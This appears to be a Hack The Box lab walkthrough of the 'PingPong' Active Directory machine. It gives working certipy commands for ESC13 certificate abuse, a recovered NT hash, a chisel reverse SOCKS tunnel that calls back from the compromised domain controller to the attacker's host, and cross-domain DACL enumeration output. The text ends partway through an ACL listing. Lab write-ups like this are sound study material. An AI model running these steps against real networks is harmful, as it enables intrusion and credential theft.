Architecture Overview

Two Active Directory domains connected by a bidirectional forest trust:

DomainDC HostnameIPReachable from Kali?
ping.htbdc1.ping.htb10.129.43.213✅ Direct
pong.htbdc2.pong.htb192.168.2.2❌ Internal only - must pivot via DC1

NTLM is disabled domain-wide on both domains. Every authentication must use Kerberos.

Full Attack Chain

%%{init: {'flowchart': {'htmlLabels': true}}}%% flowchart TD A["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>Domain User: c.roberts<br/>(AssumedBreach123)</span>"] B["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>ESC13: TemporaryWinRM Template<br/>PKINIT PAC Group Injection</span>"] C["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>WinRM Shell on DC1<br/>PING Domain</span>"] D["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>Forest Trust Discovery<br/>pong.htb at 192.168.2.2</span>"] E["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>Chisel Reverse SOCKS Tunnel<br/>Pivot Through DC1</span>"] F["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>Cross-Domain DACL Chain<br/>PING\\IT owns PONG\\gMSA Managers</span>"] G["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>Convert Group Scope<br/>Add c.roberts as FSP</span>"] H["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>ReadGMSAPassword<br/>Pong_gMSA$</span>"] I["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>JEA Endpoint Access on DC1<br/>As Pong_gMSA$</span>"] J["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>PSReadLine History Leak<br/>c.carlssen Credentials</span>"] K["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>WinRM on DC2<br/>user.txt</span>"] L["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>GenericWrite on svc_sql<br/>Configure RBCD</span>"] M["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>S4U Impersonation<br/>c.adam to MSSQL Sysadmin</span>"] N["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>xp_cmdshell as svc_sql<br/>SeImpersonate Privilege</span>"] O["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>GodPotato Escalation<br/>c.carlssen in Administrators (DC2)</span>"] P["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>DCSync<br/>Recover R.Martinelli</span>"] Q["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>ESC4 to ESC1<br/>SmartcardAuthentication Template Abuse</span>"] R["<span style='display:inline-block;min-width:280px;line-height:1.35;padding:2px 0 6px 0'>PKINIT as Administrator@ping.htb<br/>root.txt</span>"] A --> B --> C --> D --> E --> F --> G --> H --> I --> J --> K --> L --> M --> N --> O --> P --> Q --> R style A fill:#1e3a5f,color:#fff,stroke:#4a90d9 style B fill:#1e3a5f,color:#fff,stroke:#4a90d9 style C fill:#1e3a5f,color:#fff,stroke:#4a90d9 style D fill:#2a4a2a,color:#fff,stroke:#5a9a5a style E fill:#2a4a2a,color:#fff,stroke:#5a9a5a style F fill:#2a4a2a,color:#fff,stroke:#5a9a5a style G fill:#4a3a1e,color:#fff,stroke:#d4a030 style H fill:#4a3a1e,color:#fff,stroke:#d4a030 style I fill:#4a3a1e,color:#fff,stroke:#d4a030 style J fill:#7a1f1f,color:#fff,stroke:#e05252 style K fill:#7a1f1f,color:#fff,stroke:#e05252 style L fill:#7a1f1f,color:#fff,stroke:#e05252 style M fill:#7a1f1f,color:#fff,stroke:#e05252 style N fill:#7a1f1f,color:#fff,stroke:#e05252 style O fill:#7a1f1f,color:#fff,stroke:#e05252 style P fill:#7a1f1f,color:#fff,stroke:#e05252 style Q fill:#7a1f1f,color:#fff,stroke:#e05252 style R fill:#7a1f1f,color:#fff,stroke:#e05252

0. Initial Conditions

Given:

  • Credentials: c.roberts / AssumedBreach123
  • Target IP: 10.129.43.xxx (resolves to dc1.ping.htb`)

Add to /etc/hosts:

10.129.43.xxx  dc1.ping.htb ping.htb pingpong.htb DC1
192.168.2.2    dc2.pong.htb pong.htb DC2

⚠️ Hosts file ordering matters. MIT krb5 reverse-resolves IPs and picks the first hostname on the line as the canonical name for SPN construction. Always put the FQDN first. If dc2.pong.htb is not first, GSSAPI will request WSMAN/pong.htb instead of WSMAN/dc2.pong.htb and you’ll get Server not found in Kerberos database.

Early confirmation NTLM is disabled:

nxc smb dc1.ping.htb -u c.roberts -p AssumedBreach123
# SMB [*] (domain:ping.htb) (signing:True) (NTLM:False)
# SMB [-] ping.htb\c.roberts:AssumedBreach123 STATUS_NOT_SUPPORTED

Everything from this point forward uses Kerberos exclusively.


1. Recon and Kerberos Setup

Nmap

nmap -sV -sC -Pn 10.129.43.213
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-25 22:06 EAT
Nmap scan report for pingpong.htb (10.129.43.213)
Host is up (0.14s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-26 03:06:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: ping.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc1.ping.htb, DNS:ping.htb, DNS:PING
| Not valid before: 2026-04-20T18:54:50
|_Not valid after:  2106-04-20T18:54:50
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: ping.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc1.ping.htb, DNS:ping.htb, DNS:PING
| Not valid before: 2026-04-20T18:54:50
|_Not valid after:  2106-04-20T18:54:50
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: ping.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc1.ping.htb, DNS:ping.htb, DNS:PING
| Not valid before: 2026-04-20T18:54:50
|_Not valid after:  2106-04-20T18:54:50
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: ping.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc1.ping.htb, DNS:ping.htb, DNS:PING
| Not valid before: 2026-04-20T18:54:50
|_Not valid after:  2106-04-20T18:54:50
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 8h00m05s
| smb2-time: 
|   date: 2026-04-26T03:07:28
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.70 seconds

Key open ports:

53/tcp   DNS
88/tcp   Kerberos
135/tcp  RPC
389/tcp  LDAP  (Domain: ping.htb)
445/tcp  SMB   (signing required, NTLM disabled)
464/tcp  kpasswd
593/tcp  RPC over HTTP
636/tcp  LDAPS
3268/tcp Global Catalog LDAP
5985/tcp WinRM

The certificate SAN confirms: DNS:dc1.ping.htb, DNS:ping.htb, DNS:PING.

/etc/krb5.conf

[libdefaults]
    default_realm    = PING.HTB
    dns_lookup_realm = false
    dns_lookup_kdc   = false
    rdns             = false

[realms]
    PING.HTB = {
        kdc          = 10.129.43.213:88
        admin_server = 10.129.43.213
    }
    PONG.HTB = {
        kdc          = 192.168.2.2:88
        admin_server = 192.168.2.2
    }

[domain_realm]
    .ping.htb = PING.HTB
    ping.htb  = PING.HTB
    .pong.htb = PONG.HTB
    pong.htb  = PONG.HTB

⚠️ MIT krb5 parsing quirk: The [realms] block must use indented multi-line form. Single-line shorthand (PONG.HTB = { kdc = 192.168.2.2 }) silently drops the KDC entry and you’ll get Cannot find KDC for realm "PONG.HTB" later with no useful error.
Use 192.168.2.2 (IP) for the PONG KDC, not the hostname. Proxychains cannot do DNS for the KDC lookup step itself - only after you have the ticket.

Get TGT for c.roberts

impacket-getTGT ping.htb/c.roberts:AssumedBreach123 -dc-ip 10.129.43.213
export KRB5CCNAME=$(pwd)/c.roberts.ccache
klist

Verify:

Default principal: c.roberts@PING.HTB
Valid starting: ...  krbtgt/PING.HTB@PING.HTB

tgt-robert

2. ESC13 - TemporaryWinRM Template → WinRM on DC1

ADCS Enumeration

certipy find -k -no-pass \
  -dc-ip 10.129.43.213 \
  -target dc1.ping.htb \
  -dc-host dc1.ping.htb \
  -enabled -vulnerable

adcs-enum

Key finding in output:

(certipy-venv) ┌─[havoc@havocsec]─[~/Downloads/htb/season10/pingpong]
└──╼ $cat 20260426193658_Certipy.json
{
  "Certificate Authorities": {
    "0": {
      "CA Name": "ping-DC1-CA",
      "DNS Name": "dc1.ping.htb",
      "Certificate Subject": "CN=ping-DC1-CA, DC=ping, DC=htb",
      "Certificate Serial Number": "6F8E726EEFA64B894CE82D498BC27632",
      "Certificate Validity Start": "2026-04-20 18:54:41+00:00",
      "Certificate Validity End": "2126-04-20 19:04:41+00:00",
      "Web Enrollment": {
        "http": {
          "enabled": false
        },
        "https": {
          "enabled": false,
          "channel_binding": null
        }
      },
      "User Specified SAN": "Disabled",
      "Request Disposition": "Issue",
      "Enforce Encryption for Requests": "Enabled",
      "Active Policy": "CertificateAuthority_MicrosoftDefault.Policy",
      "Permissions": {
        "Owner": "PING.HTB\\Administrators",
        "Access Rights": {
          "1": [
            "PING.HTB\\Administrators",
            "PING.HTB\\Domain Admins",
            "PING.HTB\\Enterprise Admins"
          ],
          "2": [
            "PING.HTB\\Administrators",
            "PING.HTB\\Domain Admins",
            "PING.HTB\\Enterprise Admins"
          ],
          "512": [
            "PING.HTB\\Authenticated Users"
          ]
        }
      }
    }
  },
  "Certificate Templates": {
    "0": {
      "Template Name": "TemporaryWinRM",
      "Display Name": "Temporary WinRM",
      "Certificate Authorities": [
        "ping-DC1-CA"
      ],
      "Enabled": true,
      "Client Authentication": true,
      "Enrollment Agent": false,
      "Any Purpose": false,
      "Enrollee Supplies Subject": false,
      "Certificate Name Flag": [
        33554432,
        2147483648
      ],
      "Enrollment Flag": [
        1,
        8,
        32
      ],
      "Private Key Flag": [
        16
      ],
      "Extended Key Usage": [
        "Client Authentication",
        "Secure Email",
        "Encrypting File System"
      ],
      "Requires Manager Approval": false,
      "Requires Key Archival": false,
      "Authorized Signatures Required": 0,
      "Schema Version": 2,
      "Validity Period": "1 year",
      "Renewal Period": "6 weeks",
      "Minimum RSA Key Length": 2048,
      "Template Created": "2025-12-23 17:19:28+00:00",
      "Template Last Modified": "2025-12-27 21:12:15+00:00",
      "Issuance Policies": [
        "1.3.6.1.4.1.311.21.8.5808481.4086498.12600997.2067446.8927163.214.489503.1996623"
      ],
      "Linked Groups": [
        "CN=TempWinRMAccess,CN=Users,DC=ping,DC=htb"
      ],
      "Permissions": {
        "Enrollment Permissions": {
          "Enrollment Rights": [
            "PING.HTB\\Domain Admins",
            "PING.HTB\\Domain Users",
            "PING.HTB\\Enterprise Admins"
          ]
        },
        "Object Control Permissions": {
          "Owner": "PING.HTB\\Administrator",
          "Full Control Principals": [
            "PING.HTB\\Domain Admins",
            "PING.HTB\\Enterprise Admins"
          ],
          "Write Owner Principals": [
            "PING.HTB\\Domain Admins",
            "PING.HTB\\Enterprise Admins"
          ],
          "Write Dacl Principals": [
            "PING.HTB\\Domain Admins",
            "PING.HTB\\Enterprise Admins"
          ],
          "Write Property Enroll": [
            "PING.HTB\\Domain Admins",
            "PING.HTB\\Domain Users",
            "PING.HTB\\Enterprise Admins"
          ]
        }
      },
      "[+] User Enrollable Principals": [
        "PING.HTB\\Domain Users"
      ],
      "[!] Vulnerabilities": {
        "ESC13": "Template allows client authentication and issuance policy is linked to group 'CN=TempWinRMAccess,CN=Users,DC=ping,DC=htb'."
      }
    }
  }
}

What ESC13 Is

ESC13 is the OID-to-group link vulnerability, described in this 2023 research by Jonas Bülow Knudsen.

The mechanism:

  1. A certificate template has an issuance policy OID attached to it.
  2. That OID is linked to a security group via msDS-OIDToGroupLink on the OID object in CN=OID,CN=Public Key Services,CN=Services,CN=Configuration.
  3. When a user presents a certificate issued from this template for PKINIT (Kerberos), the KDC validates the policy OID and injects the linked group’s SID into the user’s PAC.
  4. The user now appears to be a member of TempWinRMAccess - without actually being in the group. WinRM access is granted dynamically.

There is nothing wrong with the template’s flags or DACL. The danger is entirely in the OID-to-group link. This is why -vulnerable flags it - standard template auditing misses it.

Exploit ESC13

Step 1 - Enroll a certificate:

certipy req -k -no-pass \
  -ca ping-DC1-CA \
  -template TemporaryWinRM \
  -target dc1.ping.htb \
  -dc-ip 10.129.43.213 \
  -dc-host dc1.ping.htb

certipy-req

Output:

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Got certificate with UPN 'C.Roberts@ping.htb'
[*] Certificate object SID is 'S-1-5-21-...-2617'
[*] Saved certificate and private key to 'c.roberts.pfx'

Step 2 - PKINIT authentication:

certipy auth -pfx c.roberts.pfx -dc-ip 10.129.43.213

certipy-auth Output:

[*] Certificate identities:
[*]     SAN UPN: 'C.Roberts@ping.htb'
[*]     Security Extension SID: 'S-1-5-21-750635624-2058721901-1932338391-2617'
[*] Using principal: 'c.roberts@ping.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'c.roberts.ccache'
File 'c.roberts.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote credential cache to 'c.roberts.ccache'
[*] Trying to retrieve NT hash for 'c.roberts'
[*] Got hash for 'c.roberts@ping.htb': aad3b435b51404eeaad3b435b51404ee:2475be69d40e815588a85fd89c7a439d

Step 3 - WinRM shell:

export KRB5CCNAME=$(pwd)/c.roberts.ccache
evil-winrm -i dc1.ping.htb -r PING.HTB

roberts-shell

Confirm group injection:

*Evil-WinRM* PS C:\Users\C.Roberts\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
PING\TempWinRMAccess                        Group            S-1-5-21-750635624-2058721901-1932338391-2602 Mandatory group, Enabled by default, Enabled group
PING\IT                                     Group            S-1-5-21-750635624-2058721901-1932338391-2618 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Certificate  Well-known group S-1-5-65-1                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
*Evil-WinRM* PS C:\Users\C.Roberts\Documents>

The NT AUTHORITY\This Organization Certificate SID (S-1-5-65-1) confirms the TGT was obtained via certificate-based PKINIT, which is what triggers the PAC group injection.

Key Intel Gathered from DC1 Shell

*Evil-WinRM* PS C:\Users\C.Roberts\Documents> nltest /domain_trusts
List of domain trusts:
    0: pong pong.htb (NT 5) (Direct Outbound) (Direct Inbound) ( Attr: foresttrans )
    1: PING ping.htb (NT 5) (Forest Tree Root) (Primary Domain) (Native)
The command completed successfully

Bidirectional forest trust. foresttrans = TRUST_ATTRIBUTE_FOREST_TRANSITIVE.

# DC2's IP
nslookup dc2.pong.htb
# or via DNS query:
Resolve-DnsName dc2.pong.htb
dc2.pong.htb → 192.168.2.2

192.168.2.2 is internal - DC1 has a second NIC on 192.168.2.1/24. Not reachable from Kali directly.


3. Pivot - Chisel Reverse SOCKS Tunnel

Since 192.168.2.2 is only reachable from DC1, tunnel all PONG traffic through DC1 using a reverse SOCKS proxy.

Setup

On Kali - download chisel binaries:

# Linux (attacker)
wget https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gz
gunzip chisel_1.10.1_linux_amd64.gz && mv chisel_1.10.1_linux_amd64 chisel && chmod +x chisel

# Windows (for DC1)
wget https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_windows_amd64.gz
gunzip chisel_1.10.1_windows_amd64.gz && mv chisel_1.10.1_windows_amd64 chisel.exe

On Kali - start reverse server:

./chisel server -p 8888 --reverse

Upload to DC1 and run in background:

# In Evil-WinRM
upload /path/to/chisel.exe C:\Windows\Temp\chisel.exe

# Run in background (shell stays free)
Start-Process -FilePath "C:\Windows\Temp\chisel.exe" `
  -ArgumentList "client YOUR_KALI_TUN0_IP:8888 R:1080:socks" `
  -WindowStyle Hidden

# Verify
Get-Process chisel

Use ip a | grep tun0 on Kali to get your HTB VPN IP.

Kali - configure proxychains:

# /etc/proxychains4.conf - add/replace the last line:
socks5 127.0.0.1 1080

Verify tunnel works:

proxychains nxc smb dc2.pong.htb -k --use-kcache
# Should show: [+] PING.HTB\c.roberts from ccache

tunnel-confirm

The chisel server logs will show session#N: tun: proxy#R:127.0.0.1:1080=>socks: Listening when the tunnel is established.


4. Cross-Domain DACL Abuse → ReadGMSAPassword

What We Find in PONG’s Directory

Using the PING Kerberos ticket against PONG’s LDAP (forest trust allows cross-realm LDAP reads):

proxychains nxc ldap dc2.pong.htb -k --use-kcache --gmsa
Account: Pong_gMSA$
NTLM: <no read permissions>
PrincipalsAllowedToReadPassword: gMSA Managers

pingpong-proxy-gmsa

proxychains nxc ldap dc2.pong.htb -k --use-kcache --groups "gMSA Managers"
# Group has 0 members - intentionally empty

gmsa-0-mebers

Check the owner of gMSA Managers:

proxychains nxc ldap dc2.pong.htb -k --use-kcache -M daclread \
  -o TARGET_DN="CN=gMSA Managers,CN=Users,DC=pong,DC=htb"

The ACL shows PING\IT as the owner of the group object. Owner = implicit WriteOwner + WriteDACL.

┌─[havoc@havocsec]─[~/Downloads/htb/season10/pingpong]
└──╼ $proxychains nxc ldap dc2.pong.htb -k --use-kcache -M daclread \
  -o TARGET_DN="CN=gMSA Managers,CN=Users,DC=pong,DC=htb"
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.2.2:389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.2.2:389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.2.2:636  ...  OK
LDAP        dc2.pong.htb    389    DC2              [*] None (name:DC2) (domain:PING.HTB) (signing:None) (channel binding:No TLS cert) (NTLM:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.2.2:389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  PING.HTB:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  PONG.HTB:88  ...  OK
LDAP        dc2.pong.htb    389    DC2              [+] PING.HTB\c.roberts from ccache 
DACLREAD    dc2.pong.htb    389    DC2              Be careful, this module cannot read the DACLS recursively.
DACLREAD    dc2.pong.htb    389    DC2              Target principal found in LDAP (CN=gMSA Managers,CN=Users,DC=pong,DC=htb)
DACLREAD    dc2.pong.htb    389    DC2              ACE[0] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : None
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : Token-Groups-Global-And-Universal (46a9b11d-60ae-405a-b7e8-ff8a58d456d2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Windows Authorization Access Group (S-1-5-32-560)
DACLREAD    dc2.pong.htb    389    DC2              ACE[1] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : None
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ControlAccess
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : Send-To (ab721a55-1e2f-11d0-9819-00aa0040529b)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Authenticated Users (S-1-5-11)
DACLREAD    dc2.pong.htb    389    DC2              ACE[2] info
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : FullControl, Modify, ReadAndExecute, ReadAndWrite, Read, Write, WriteDACL, Delete, ListObject, WriteProperties, Self, CreateChild (0xf01ff)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Domain Admins (S-1-5-21-2410575906-3092493790-2123333151-512)
DACLREAD    dc2.pong.htb    389    DC2              ACE[3] info
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : FullControl, Modify, ReadAndExecute, ReadAndWrite, Read, Write, WriteDACL, Delete, ListObject, WriteProperties, Self, CreateChild (0xf01ff)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Account Operators (S-1-5-32-548)
DACLREAD    dc2.pong.htb    389    DC2              ACE[4] info
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : Read (0x20094)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Principal Self (S-1-5-10)
DACLREAD    dc2.pong.htb    389    DC2              ACE[5] info
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : Read (0x20094)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Authenticated Users (S-1-5-11)
DACLREAD    dc2.pong.htb    389    DC2              ACE[6] info
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : FullControl, Modify, ReadAndExecute, ReadAndWrite, Read, Write, WriteDACL, Delete, ListObject, WriteProperties, Self, CreateChild (0xf01ff)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Local System (S-1-5-18)
DACLREAD    dc2.pong.htb    389    DC2              ACE[7] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : User-Account-Restrictions (4c164200-20c0-11d0-a768-00aa006e0529)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : inetOrgPerson (4828cc14-1437-45bc-9b07-ad6f015e5f28)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[8] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : User-Account-Restrictions (4c164200-20c0-11d0-a768-00aa006e0529)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[9] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : User-Logon (5f202010-79a5-11d0-9020-00c04fc2d4cf)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : inetOrgPerson (4828cc14-1437-45bc-9b07-ad6f015e5f28)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[10] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : User-Logon (5f202010-79a5-11d0-9020-00c04fc2d4cf)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[11] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : Membership (bc0ac240-79a9-11d0-9020-00c04fc2d4cf)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : inetOrgPerson (4828cc14-1437-45bc-9b07-ad6f015e5f28)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[12] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : Membership (bc0ac240-79a9-11d0-9020-00c04fc2d4cf)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[13] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
